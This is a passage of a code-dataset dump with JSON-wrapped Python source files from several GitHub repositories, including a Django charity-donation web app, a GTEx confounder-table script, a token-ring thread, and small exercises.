\r\n\r\nclass InputFile(File):\r\n \"\"\"\r\n An APX input file. when written to, it notifies the upper layer (NodeDataHandler) about the change\r\n \"\"\"\r\n def __init__(self, name, length, init_data=None):\r\n super().__init__(name, length, init_data)\r\n self.nodeDataHandler=None\r\n \r\n def write(self, offset: int, data: bytes, more_bit : bool = False):\r\n retval = super().write(offset, data) \r\n if (retval>=0) and (more_bit == False):\r\n if self.nodeDataHandler is not None:\r\n self.nodeDataHandler.inPortDataWriteNotify(self, offset, len(data))\r\n return retval\r\n \r\n\r\nclass OutputFile(File):\r\n \"\"\"\r\n An APX output file. when written to, it notifies the lower layer (FileManager) about the change\r\n \"\"\"\r\n def __init__(self, name, length, init_data=None):\r\n super().__init__(name, length, init_data)\r\n \r\n def write(self, offset: int, data: bytes):\r\n retval = super().write(offset, data)\r\n if (retval >=0) and (self.fileManager is not None) and (self.isOpen==True):\r\n self.fileManager.outPortDataWriteNotify(self, offset, len(data))\r\n return retval\r\n ","repo_name":"cogu/py-apx","sub_path":"apx/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6547544227","text":"''' Funciones integradas\nstr pasa la variable a cadena\nint pasa la variabla a entero\nfloat pasa la variabla a flotante\nbin pasa a binario\nhex pasa a hexadecimal\nround redondea\nlen cuenta caracteres de una cadena\n\n'''\n\nn = str(10)\nn = int(\"10\")\nn = float(\"10.3\")\nn = bin(10)\nn = int('0b1010',2) # pasa de binario a entero (base 2)\nn = int('0xa', 16) # pasa de hexadecimal a entero (base 16)\n\n\nprint(n)\n\n\n\n","repo_name":"mastrangeloispc/ejerciciosPyhton","sub_path":"funciones integradas.py","file_name":"funciones integradas.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"43525908985","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 28 13:11:25 2017\r\n\r\n@author: Elham\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.spatial import distance\r\n\r\n\r\ndef ClC(m,X): \r\n \r\n X = X[:, 3:, :]\r\n \r\n m = m[:, 3:, :]\r\n \r\n dmin = np.zeros( [np.shape(X)[0], 1, np.shape(X)[2]] )\r\n ind = np.zeros( [np.shape(X)[0], 1, np.shape(X)[2]] )\r\n \r\n \r\n # Calculate Distance Matrix \r\n for q in range ( np.shape(X)[2] ):\r\n \r\n d = distance.cdist(X[:,:,q], m[:,:,q], 'euclidean')\r\n \r\n # Assign Clusters and Find Closest Distances\r\n dmin[:,0,q], ind[:,0,q] = d.min(axis=1), d.argmin(axis=1)\r\n \r\n \r\n # Sum of Within-Cluster Distance\r\n WCD = np.sum(dmin)\r\n \r\n z=WCD\r\n\r\n # Empty dict\r\n out={} \r\n \r\n out[\"d\"] = d\r\n out[\"dmin\"] = dmin\r\n out[\"ind\"] = ind\r\n out[\"WCD\"] = WCD \r\n \r\n del d,X,m,dmin,ind,WCD \r\n \r\n return z,out\r\n","repo_name":"blueeyedwhitewolf/Projects","sub_path":"Machine Learning/projeto verao/PythonWorks/LNDeterctor_NoduleSegmentation/ClusteringCost.py","file_name":"ClusteringCost.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"32119561170","text":"#!/usr/bin/env python3\n\n\"\"\"\nAuthor: Andrew Hamel\nDate: 27 March 2019\n\nPython3 script to parse .allpairs.txt.gz files in GTEx to create confounders table to run in QTLEnrich.\n\nRequires at least pandas release 0.24\n\nArguments:\n 1. Directory\n 2. file_extension (files in the directory to be parsed e.g. .allpairs.txt.gz)\n 3. Variant_List (unique list of all variants)\n 4. LD_Proxy (file containing variants and the number of LD proxy variants)\n 5. Output_File (name of file created with path. If path not included, defaults to current working directory.)\n\nReturns:\n 1. Confounders table\n\nConfounder Table format:\n Headers\n A. variant (variant_id in the form chrN_pos_ref_alt_b38)\n B. LD_proxy (number of LD proxy variants for a given variant)\n C. MAF_Tissue (For each tissue-variant pair, minor allele frequency is indicated)\n D. TSS_Tissue (For each tissue-variant pair, nearest TSS distance is chosen)\n\n\"\"\"\n\nimport os\nimport os.path\nimport argparse\nimport re\nimport pandas as pd\nimport numpy as np\n\ndef Format_GENCODE_File(GENCODE):\n \"\"\"\n Prepare GENCODE File to merge with retina eQTL file\n \"\"\"\n GENCODE_df = pd.read_csv(GENCODE,sep='\\t')\n\n #select genes\n GENCODE_df_gene = GENCODE_df.loc[GENCODE_df['feature'] == 'gene'].copy()\n\n #extract relevant columns\n GENCODE_df_gene = GENCODE_df_gene[['gene_id','start','end','strand']]\n GENCODE_df_gene = GENCODE_df_gene.rename(columns = {'start':'gene_start','end':'gene_end'})\n\n return GENCODE_df_gene\n\ndef Merge_GENCODE_QTL(variant_df,gencode):\n \"\"\"\n Merge GENCODE file and retina file on ensembl gene_id, without decimal suffix\n \"\"\"\n print('merging')\n Merged_File = pd.merge(variant_df,gencode,on=['gene_id'])\n return Merged_File\n\ndef Compute_TSS_Distance(variant_df,gencode):\n \"\"\"\n compute tss distance\n\n if strand is positive:\n tss distance = start of variant -- start of gene\n if strand is negative:\n tss distance = (start of variant -- end of gene)*(-1)\n \"\"\"\n GENCODE_QTL = Merge_GENCODE_QTL(variant_df,gencode)\n print('computing TSS_Distance')\n\n #compute TSS Distance for positive and negative strands separately\n #append back together\n GENCODE_QTL_pos_strand = GENCODE_QTL.loc[GENCODE_QTL['strand'] == '+'].copy()\n GENCODE_QTL_neg_strand = GENCODE_QTL.loc[GENCODE_QTL['strand'] == '-'].copy()\n\n GENCODE_QTL_pos_strand['TSS_Distance'] = GENCODE_QTL_pos_strand['pos'] - GENCODE_QTL_pos_strand['gene_start']\n GENCODE_QTL_neg_strand['TSS_Distance'] = (GENCODE_QTL_neg_strand['pos'] - GENCODE_QTL_neg_strand['gene_end'])*(-1)\n\n GENCODE_QTL_Full = GENCODE_QTL_pos_strand.append(GENCODE_QTL_neg_strand)\n GENCODE_QTL_Full = GENCODE_QTL_Full.drop(['gene_start','gene_end','strand'],axis=1)\n\n return GENCODE_QTL_Full\n\ndef Parse_QTL_File(QTL_File,QTL_Directory,Tissue,gencode):\n \"\"\"\n Parses QTLs\n\n 1. Removes rows with MAF=0\n 2. If strand < 0: multiply TSS*-1\n 3. Sorts by absolute value of TSS distance\n 3. Removes duplicates, selecting rows with smallest TSS distance\n 4. Renames columns in form: variant,MAF_Tissue,TSS_Tissue \n \"\"\"\n QTL = pd.read_csv(QTL_Directory+QTL_File,sep='\\t',usecols=['variant_id','gene_id','maf'])\n\n #remove rows with maf=0\n QTL = QTL.loc[QTL['maf'] != 0.0]\n\n #extract ensemblID\n QTL['pos'] = QTL['variant_id'].str.split('_',2).str[1].astype(int)\n\n #computing tss distance\n QTL_computed_tss_distance = Compute_TSS_Distance(QTL,gencode)\n\n del QTL\n\n #create column of absolute value of tss_distance\n #sort by abs value, ascending\n QTL_computed_tss_distance['Abs_tss_distance'] = QTL_computed_tss_distance['TSS_Distance'].abs()\n QTL_computed_tss_distance = QTL_computed_tss_distance.sort_values(by=['Abs_tss_distance'],ascending=True)\n\n #drop duplicates\n #keep smallest tss_distance\n QTL_computed_tss_distance = QTL_computed_tss_distance.drop_duplicates(subset=['variant_id'],keep='first')\n print('length after removing duplicates:',len(QTL_computed_tss_distance))\n #rename columns\n #drop Abs_Tss column\n QTL_computed_tss_distance = QTL_computed_tss_distance.rename(columns={'variant_id':'variant','TSS_Distance':'TSS_'+Tissue,'maf':'MAF_'+Tissue})\n QTL_computed_tss_distance = QTL_computed_tss_distance.drop(['Abs_tss_distance','gene_id','pos'],axis=1)\n QTL_computed_tss_distance['MAF_'+Tissue] = QTL_computed_tss_distance['MAF_'+Tissue].round(decimals=5)\n\n return QTL_computed_tss_distance\n\ndef parse_args():\n \"\"\"\n Arguments passed to generate confounders table\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Generate confounders table to be used on QTLEnrich\")\n parser.add_argument('-D','--QTL_Directory',type=str,help='Directory containing QTL files to parse',required=True)\n parser.add_argument('-F','--File_Extension',type=str,help='File to extension to parse files in QTL directory',required=True)\n parser.add_argument('-V','--Variants_List',type=str,help='Unique list of all variants',required=True)\n parser.add_argument('-L','--LD_Proxy',type=str,help='File containing number of LD proxy variants',required=True)\n parser.add_argument('-G','--GENCODE_File',type=str,help='GENCODE file to extract strand orientation',required=True)\n parser.add_argument('-O','--Output_File',type=str,help='Name of generated file',required=True)\n\n return parser.parse_args()\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n print('parsing gencode')\n gencode = Format_GENCODE_File(args.GENCODE_File)\n\n #select files to parse\n QTL_Files = [x for x in os.listdir(args.QTL_Directory) if x.endswith(args.File_Extension)]\n\n #read unique variants file\n #denoted as confounders table\n Confounders_Table_df = pd.read_csv(args.Variants_List,sep='\\t') \n Confounders_Table_df = Confounders_Table_df.drop_duplicate()\n\n #Merge with LD Proxy file\n LD_Proxy_df = pd.read_csv(args.LD_Proxy,sep='\\t')\n Confounders_Table_df = pd.merge(Confounders_Table_df,LD_Proxy_df,on=['variant'],how='outer')\n\n print('length of confounders table before merging:',len(Confounders_Table_df))\n\n #parse files\n for Count,QTL_File in enumerate(QTL_Files,1):\n print(Count,QTL_File)\n\n #Extract tissue name\n tissue=re.sub(args.File_Extension,'',QTL_File)\n\n #parse file\n #merge with preexisting table\n df = Parse_QTL_File(QTL_File,args.QTL_Directory,tissue,gencode)\n Confounders_Table_df = pd.merge(Confounders_Table_df,df,on=['variant'],how='outer')\n print('length after merging:',len(Confounders_Table_df))\n\n #write to file\n Confounders_Table_df.to_csv(args.Output_File,sep='\\t',header=True,index=None,compression='gzip')\n \n \n","repo_name":"segrelabgenomics/QTLEnrich","sub_path":"src/Generate_Confounders_Table.py","file_name":"Generate_Confounders_Table.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"1839933936","text":"class WordCounter:\r\n \"\"\"Class for counting occurrences of specified keywords in given text\"\"\"\r\n\r\n def __init__(self, text=None, keywords=None):\r\n \"\"\"Construct a word counter\r\n\r\n text - text to analyse (defaults to '')\r\n keywords - words to search and count inside text, separated by commas (defaults to '')\r\n \"\"\"\r\n self._text = ''\r\n self._keywords = ''\r\n\r\n self.text = text\r\n self.keywords = keywords\r\n\r\n def count(self):\r\n \"\"\"Count keywords in specified text\r\n\r\n Return dictionary of keywords with counted occurrences\"\"\"\r\n statistics = {}\r\n\r\n if len(self._text) > 0 and len(self._keywords) > 0:\r\n statistics = dict((kw.strip(), 0) for kw in self._keywords.split(','))\r\n for s in statistics:\r\n statistics[s] = self._text.lower().count(s.lower())\r\n\r\n return statistics\r\n\r\n @property\r\n def text(self):\r\n \"\"\"Return the text intended to analyse\"\"\"\r\n return self._text\r\n\r\n @text.setter\r\n def text(self, text):\r\n \"\"\"Set the text to analyse\"\"\"\r\n if isinstance(text, str):\r\n self._text = text\r\n else:\r\n self._text = ''\r\n\r\n @property\r\n def keywords(self):\r\n \"\"\"Return the keywords intended to search inside the text\"\"\"\r\n return self._keywords\r\n\r\n @keywords.setter\r\n def keywords(self, keywords):\r\n \"\"\"Set the keywords to search inside the text\"\"\"\r\n if isinstance(keywords, str):\r\n self._keywords = keywords\r\n else:\r\n self._keywords = ''\r\n","repo_name":"lukwlw/keywords_counter","sub_path":"keywords/tools/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"43130166945","text":"# REFERENCES\n# Title: Simple Ecommerce\n# Author: overiq\n# Date Published: Dec 8, 2018\n# Date Accessed: Oct 18, 2020\n# Code version: commit 704596f\n# URL: https://github.com/overiq/simple_ecommerce\n# Software License: MIT License\n\nfrom django.shortcuts import render, HttpResponse, redirect, get_object_or_404, reverse\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.template.defaultfilters import slugify\nfrom decimal import Decimal\nfrom paypal.standard.forms import PayPalPaymentsForm\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import CharityOrg, Cause, Order, LineItem, User\nfrom .forms import CartForm, CheckoutForm, CharityForm, CauseForm, DeleteForm, CharitySearchForm, BasicSearchForm\nfrom . import cart\nfrom taggit.models import Tag\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout as django_logout\nfrom django.db.models import Count\nfrom django.template import RequestContext\n\n# Create your views here.\n# Test\n\ndef index(request):\n return render(request, 'microDonation/index.html', {})\n\ndef not_authorized(request):\n return render(request, 'microDonation/login.html', {})\n\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n user = form.save()\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(request, email=user.email, password=raw_password)\n if user is not None:\n login(request, user)\n else:\n print(\"user is not authenticated\")\n return redirect('microDonation/')\n else:\n form = SignupForm()\n return render(request, 'microDonation/login.html', {'form': form})\n\ndef about(request):\n return render(request, 'microDonation/about.html', {})\n\ndef login(request):\n return render(request, 'microDonation/login.html', {'all_charities': CharityOrg.objects.filter(is_deleted = False)})\n\n\n\n@login_required\ndef logout(request):\n django_logout(request)\n return render(request, 'microDonation/login.html')\n\n# hey bradley, am I correctly passing in the list of charities?\ndef charities(request):\n return render(request,'microDonation/charities.html', {'all_charities': CharityOrg.objects.filter(is_deleted = False)}\n)\n\ndef show_charity(request, charity_id):\n charityOrg = get_object_or_404(CharityOrg, id=charity_id)\n charity_causes = Cause.objects.filter(charity=charityOrg.pk).filter(is_deleted=False)\n charity_orders = charityOrg.charity_orders.all()\n charity_dict = {}\n for o in charity_orders:\n charity_dict[o] = o.charity_cost(charityOrg)\n print(\"charity orders\")\n print(charity_orders)\n if charityOrg.is_deleted:\n return redirect('charities')\n else:\n return render(request, 'microDonation/charity_detail.html', {'charity': charityOrg,\n 'causes': charity_causes,\n 'orders': charity_dict,\n })\n\n@login_required\ndef create_charity(request):\n if request.method == 'POST':\n form = CharityForm(request.POST, request.FILES)\n print(form['authorized_users'], flush=True)\n if form.is_valid():\n authorized_users = form.cleaned_data.get('authorized_users').split(',')\n authenticated_users = []\n for user in authorized_users:\n if User.objects.filter(email=user).exists():\n authenticated_users.append(User.objects.get(email=user))\n if authenticated_users == []:\n authenticated_users.append(request.user)\n newCharity = form.save(commit=False)\n newCharity.slug = slugify(newCharity.name)\n newCharity.save()\n form.save_m2m()\n newCharity.authenticated_users.set(authenticated_users)\n newCharity.save()\n return redirect('charities')\n form = CharityForm(initial={'authorized_users': request.user.email})\n return render(request, 'microDonation/create_charity.html', {\n 'form': form\n })\n\n@login_required\ndef update_charity(request, charity_id):\n charityorg = CharityOrg.objects.get(id=charity_id)\n if charityorg.is_deleted:\n return redirect('charities')\n if charityorg.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n updateform = CharityForm(request.POST, request.FILES, instance=charityorg)\n if updateform.is_valid():\n authorized_users = updateform.cleaned_data.get('authorized_users').split(',')\n authenticated_users = []\n for user in authorized_users:\n if User.objects.filter(email=user).exists():\n authenticated_users.append(User.objects.get(email=user))\n if authenticated_users == []:\n authenticated_users.append(request.user)\n charityorg = updateform.save(commit=False)\n charityorg.slug = slugify(charityorg.name)\n charityorg.save()\n updateform.save_m2m()\n charityorg.authenticated_users.set(authenticated_users)\n charityorg.save()\n return redirect('charities')\n else:\n authenticated_users = charityorg.authenticated_users.all()\n authorized_users = \"\"\n for user in authenticated_users:\n authorized_users = authorized_users + user.email + \",\"\n form = CharityForm(initial={'authorized_users': authorized_users},instance=charityorg)\n return render(request, 'microDonation/update_charity.html', {\n 'form': form,\n })\n else:\n return redirect('not_authorized')\n\n@login_required\ndef delete_charity(request, charity_id):\n charityorg = CharityOrg.objects.get(id=charity_id)\n if charityorg.is_deleted:\n return redirect('charities')\n if charityorg.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n deleteform = DeleteForm(request.POST)\n if deleteform.is_valid():\n print(\"Form is valid!\")\n charityorg.is_deleted = deleteform.cleaned_data['delete']\n charityorg.save()\n else:\n print(\"Form is invalid!\")\n print(deleteform.errors)\n return redirect('charities')\n else:\n form = DeleteForm(request)\n return render(request, 'microDonation/delete_charity.html', {\n 'form': form,\n 'charity': charityorg,\n })\n else:\n return redirect('not_authorized')\n\ndef show_cause(request, cause_id):\n cause = get_object_or_404(Cause, id=cause_id)\n if cause.is_deleted:\n return redirect('show_charity', cause.charity.pk)\n if request.method == 'POST':\n cartform = CartForm(request, request.POST)\n if cartform.is_valid():\n request.form_data = cartform.cleaned_data\n cart.add_item_to_cart(request)\n return redirect('show_cart')\n\n form = CartForm(request, initial={'cause_id': cause.id})\n return render(request, 'microDonation/cause_detail.html', {\n 'cause': cause,\n 'form': form,\n })\n\n@login_required\ndef create_cause(request, charity_id):\n charity = get_object_or_404(CharityOrg, id=charity_id)\n if charity.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n form = CauseForm(request.POST, request.FILES)\n if form.is_valid():\n newCause = form.save(commit=False)\n newCause.slug = slugify(newCause.name)\n newCause.charity = charity\n newCause.save()\n form.save_m2m()\n return redirect('show_charity', charity.pk)\n form = CauseForm(data={'charity':charity})\n return render(request, 'microDonation/create_cause.html', {\n 'form': form,\n })\n else:\n return redirect('not_authorized')\n\n@login_required\ndef update_cause(request, cause_id):\n cause = Cause.objects.get(id=cause_id)\n if cause.is_deleted:\n return redirect('show_charity', cause.charity.pk)\n if cause.charity.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n updateform = CauseForm(request.POST, request.FILES, instance=cause)\n if updateform.is_valid():\n cause = updateform.save(commit=False)\n cause.slug = slugify(cause.name)\n cause.save()\n updateform.save_m2m()\n return redirect('show_charity', cause.charity.pk)\n else:\n form = CauseForm(instance=cause)\n return render(request, 'microDonation/update_cause.html', {\n 'form': form,\n })\n else:\n return redirect('not_authorized')\n\n@login_required\ndef delete_cause(request, cause_id):\n cause = Cause.objects.get(id=cause_id)\n if cause.is_deleted:\n return redirect('show_charity', cause.charity.pk)\n if cause.charity.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n deleteform = DeleteForm(request.POST)\n if deleteform.is_valid():\n print(\"Form is valid!\")\n cause.is_deleted = deleteform.cleaned_data['delete']\n cause.save()\n else:\n print(\"Form is invalid!\")\n print(deleteform.errors)\n return redirect('show_charity', cause.charity.pk)\n else:\n form = DeleteForm(request)\n return render(request, 'microDonation/delete_cause.html', {\n 'form': form,\n })\n else:\n return redirect('not_authorized')\n\ndef show_cart(request):\n print(\"attempting to show cart \", flush=True)\n if request.method == 'POST':\n if request.POST.get('submit') == 'Update':\n cart.update_item(request)\n if request.POST.get('submit') == 'Remove':\n cart.remove_item(request)\n cart_items = cart.get_all_cart_items(request)\n cart_subtotal = cart.subtotal(request)\n print(\"attempting to render page \", flush=True)\n return render(request, 'microDonation/cart.html', {'cart_items': cart_items,\n 'cart_subtotal': cart_subtotal,\n })\n\ndef search_charity(request):\n form = CharitySearchForm()\n results = []\n if request.method == 'POST':\n form = BasicSearchForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n cForm = CharitySearchForm({'search_type': 'name', 'search_value': form.cleaned_data.get(\"search_val\")})\n results = list(CharityOrg.objects.filter(name__icontains=data.get('search_val')).filter(is_deleted = False))\n return render(request, 'microDonation/charity_search.html', {'form': cForm, 'results': results})\n form = CharitySearchForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n if data.get('search_type') == 'name':\n results = list(CharityOrg.objects.filter(name__icontains=data.get('search_value')).filter(is_deleted = False))\n elif data.get('search_type') == 'min_causes':\n min_value = data.get('search_value')\n obj_to_count = CharityOrg.objects.annotate(Count('cause'))\n for i in range(len(obj_to_count)):\n if obj_to_count[i].cause__count >= int(min_value):\n charity = CharityOrg.objects.get(id=obj_to_count[i].id)\n if getattr(charity, 'is_deleted') == False:\n results.append(charity)\n elif data.get('search_type') == 'tags':\n tags = [tag.strip() for tag in data.get('search_value').split(',')]\n results = CharityOrg.objects.filter(tags__name__in=tags).filter(is_deleted = False).distinct()\n else:\n print(\"search type is invalid\")\n pass\n else:\n print(\"form is not valid\")\n return render(request, 'microDonation/charity_search.html', {\n 'form': form,\n 'results': results,\n })\n\ndef _generate_order_id(): # Creates a random 10-character-long string\n import string, random # Although extremely unlikely, it does check for duplicates\n orderID = ''\n while True:\n orderID = ''\n for i in range(0,10):\n orderID = orderID.join(random.choice(string.ascii_letters + string.digits))\n if Order.objects.filter(order_id=orderID).count() == 0:\n return orderID\n\ndef process_payment(request):\n order_id = request.session.get('order_id')\n print(\"ORDER ID\")\n print(order_id)\n order = get_object_or_404(Order, id=order_id)\n host = request.get_host()\n\n paypal_dict = {\n \n 'business': settings.PAYPAL_RECEIVER_EMAIL,\n 'amount': '%.2f' % Decimal(order.total_cost()).quantize(\n Decimal('.01')),\n 'item_name': 'Order {}'.format(order.order_id),\n 'invoice': str(order.order_id),\n 'currency_code': 'USD',\n 'notify_url': 'http://{}{}'.format(host,\n reverse('paypal-ipn')),\n 'return_url': 'http://{}{}'.format(host,\n reverse('payment_done')),\n 'cancel_return': 'http://{}{}'.format(host,\n reverse('payment_cancelled')),\n }\n\n form = PayPalPaymentsForm(initial=paypal_dict)\n return render(request, 'microDonation/process_payment.html', {'order': order, 'form': form})\n\n@csrf_exempt\ndef payment_done(request):\n return render(request, 'microDonation/payment_done.html')\n\n@csrf_exempt\ndef payment_cancelled(request):\n return render(request, 'microDonation/payment_cancelled.html')\n\ndef checkout(request):\n cart_subtotal = cart.subtotal(request)\n all_items = cart.get_all_cart_items(request)\n if request.method == 'POST':\n form = CheckoutForm(request.POST)\n if form.is_valid():\n cleaned_data = form.cleaned_data\n order_charities = set()\n for cart_item in all_items:\n order_charities.add(CharityOrg.objects.get(id=Cause.objects.get(id=cart_item.cause_id).charity.id))\n o = form.save(commit=False)\n o.save()\n form.save_m2m()\n o.charities.set(list(order_charities))\n o.save()\n \n for cart_item in all_items:\n li = LineItem(\n cause_id = cart_item.cause_id,\n value = cart_item.value,\n order_id = o.id\n )\n li.save()\n\n cart.clear(request)\n request.session['order_id'] = o.id\n print(\"ORDER ID 1\")\n print(request.session['order_id'])\n return redirect('process_payment')\n else:\n form = CheckoutForm()\n return render(request, 'microDonation/checkout.html', locals())\n","repo_name":"jk4as/Microdonation","sub_path":"microDonation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22990952083","text":"for i in range(int(input())):\n n,a,b=map(int,input().split())\n cts=0\n cta=0\n string = list(\"EQUINOX\")\n for j in range(n):\n x=list(input())\n if x[0] in string:\n cts+=a\n else:\n cta+=b\n if(cts>cta):\n print(\"SARTHAK\")\n elif(cta>cts):\n print(\"ANURADHA\")\n else:\n print(\"DRAW\")\n","repo_name":"prathamesh1301/Codechef-Solutions","sub_path":"Equinox Strings.py","file_name":"Equinox Strings.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74624121393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport threading\nimport time\nimport logging\nimport xmlrpclib\nimport Queue\n\nclass TokenRing(threading.Thread):\n\n\tdef __init__(self, myaddress, peers, req_q, res_q):\n\t\t\"\"\"Peers is the connected clients dcitionary\"\"\"\n\t\tthreading.Thread.__init__(self)\n\t\tself.log = logging.getLogger(self.__class__.__name__)\n\t\tself.daemon = True\n\t\tself.kill_received = False\n\t\tself.myaddress = myaddress\n\t\tself.peers = peers\n\t\tself.wait_time = 1\n\t\tself.token = False\n\t\tself.commands = req_q\n\t\tself.results = res_q\n\t\tself.signin_q = Queue.Queue()\n\n\tdef run(self):\n\t\tself.log.debug('Starting TokenRing Thread with token: %s', str(self.token))\n\t\twhile not self.kill_received:\n\t\t\tif self.token:\n\t\t\t\t#self.log.debug('Proxy is mine')\n\t\t\t\t#next_address = self.next_peer()\n\t\t\t\t#self.log.debug('Next peer is %s', next_address)\n\t\t\t\tself.consume_command_queue()\n\t\t\t\tself.consume_signin_queue()\n\t\t\t\ttime.sleep(self.wait_time)\n\t\t\t\t#self.log.debug('Peers : %s', str(self.peers))\n\t\t\t\tif len(self.peers) > 1:\n\t\t\t\t\tself.token = False\n\t\t\t\t\tself.forward_token()\n\t\t\telse:\n\t\t\t\ttime.sleep(self.wait_time)\n\t\tself.log.debug('Token ring thread is terminating')\n\n\tdef consume_signin_queue(self):\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\taddress = self.signin_q.get(block=False)\n\t\t\texcept Queue.Empty:\n\t\t\t\tbreak\n\t\t\texcept Exception as e:\n\t\t\t\tself.log.exception(str(e))\n\t\t\telse:\n\t\t\t\tself.log.debug('Got command %s from siginqueue', str(address))\n\t\t\t\tproxy = self.create_proxy(address)\n\t\t\t\tproxy.handler1.signInApproved(self.myaddress)\n\t\t\t\tself.log.debug('Executed signInApproved from %s', address)\n\n\tdef consume_command_queue(self):\n\t\ttry:\n\t\t\tcommand = self.commands.get(block=False)\n\t\texcept Queue.Empty:\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\tself.log.exception(str(e))\n\t\telse:\n\t\t\tif not isinstance(command, basestring):\n\t\t\t\tself.log.debug('RECEIVED %d', len(command))\n\t\t\t\tto_execute = []\n\t\t\t\tfor item in command:\n\t\t\t\t\tp, command_dict = item\n\t\t\t\t\tself.log.debug('Executing for proxy: %s', repr(p))\n\t\t\t\t\tself.log.debug(str(command_dict))\n\t\t\t\t\twhile command_dict:\n\t\t\t\t\t\tfunc_name, args = command_dict.popitem(False)\n\t\t\t\t\t\tfunc = getattr(p, func_name)\n\t\t\t\t\t\tto_execute.append((func, args))\n\t\t\t\t\t\tself.log.debug('Added %s for execution', func_name)\n\t\t\t\tres = [f(*a) for f, a in to_execute]\n\t\t\t\tself.results.put(res)\n\t\t\t\tself.commands.task_done()\n\t\t\telif command == 'PAUSE':\n\t\t\t\tself.log.debug('Received PAUSE command')\n\t\t\t\tself.results.put('OK')\n\t\t\t\tself.commands.task_done()\n\t\t\t\trelease = self.commands.get(block=True)\n\t\t\t\tif release != 'RELEASE':\n\t\t\t\t\tself.log.critical('After pause you should send RELEASE')\n\t\t\t\telse:\n\t\t\t\t\tself.log.debug('Releasing token')\n\t\t\t\t\tself.results.put('OK')\n\t\t\t\tself.commands.task_done()\n\n\n\tdef forward_token(self, next_address=None):\n\t\tif not next_address:\n\t\t\tnext_address = self.next_peer()\n\t\tif next_address:\n\t\t\t#self.log.debug('We should forward the token to next: %s',\n\t\t\t#\tnext_address)\n\t\t\tproxy = self.create_proxy(next_address)\n\t\t\ttry:\n\t\t\t\tproxy.handler1.tokenReceived(self.myaddress)\n\t\t\texcept Exception as e:\n\t\t\t\tself.log.exception(str(e))\n\t\telse:\n\t\t\tself.log.debug('Nothing to forward')\n\n\tdef create_proxy(self, address):\n\t\t#self.log.debug('Creating proxy for %s', address)\n\t\ttarget_list = address.split(':')\n\t\thost, port = target_list[0], int(target_list[1])\n\t\turl = 'http://%s:%d' % (host, port)\n\t\tproxy = xmlrpclib.ServerProxy(url,allow_none=True)\n\t\treturn proxy\n\n\tdef next_peer(self):\n\t\t\"\"\"returns the address of the next peer\"\"\"\n\t\taddresses = self.peers.keys()\n\t\tnext_i = (addresses.index(self.myaddress)+1)%len(addresses)\n\t\ttry:\n\t\t\tnxt_ad = addresses[next_i]\n\t\texcept IndexError:\n\t\t\tnxt_ad = None\n\t\treturn nxt_ad\n\n\n\n","repo_name":"gosom/netcal","sub_path":"netcal/client/token_ring.py","file_name":"token_ring.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6962630216","text":"import mimetypes\nimport os\nimport tempfile\nfrom argparse import ArgumentParser\n\nimport json_tricks as json\nimport mmcv\nimport mmengine\n\nfrom mmpose.apis import inference_bottomup, init_model\nfrom mmpose.registry import VISUALIZERS\nfrom mmpose.structures import split_instances\n\n\ndef process_one_image(args, img_path, pose_estimator, visualizer,\n show_interval):\n \"\"\"Visualize predicted keypoints (and heatmaps) of one image.\"\"\"\n\n # inference a single image\n batch_results = inference_bottomup(pose_estimator, img_path)\n results = batch_results[0]\n\n # show the results\n img = mmcv.imread(img_path, channel_order='rgb')\n\n out_file = None\n if args.output_root:\n out_file = f'{args.output_root}/{os.path.basename(img_path)}'\n\n visualizer.add_datasample(\n 'result',\n img,\n data_sample=results,\n draw_gt=False,\n draw_bbox=False,\n draw_heatmap=args.draw_heatmap,\n show_kpt_idx=args.show_kpt_idx,\n show=args.show,\n wait_time=show_interval,\n out_file=out_file,\n kpt_score_thr=args.kpt_thr)\n\n return results.pred_instances\n\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('config', help='Config file')\n parser.add_argument('checkpoint', help='Checkpoint file')\n parser.add_argument(\n '--input', type=str, default='', help='Image/Video file')\n parser.add_argument(\n '--show',\n action='store_true',\n default=False,\n help='whether to show img')\n parser.add_argument(\n '--output-root',\n type=str,\n default='',\n help='root of the output img file. '\n 'Default not saving the visualization images.')\n parser.add_argument(\n '--save-predictions',\n action='store_true',\n default=False,\n help='whether to save predicted results')\n parser.add_argument(\n '--device', default='cuda:0', help='Device used for inference')\n parser.add_argument(\n '--draw-heatmap',\n action='store_true',\n 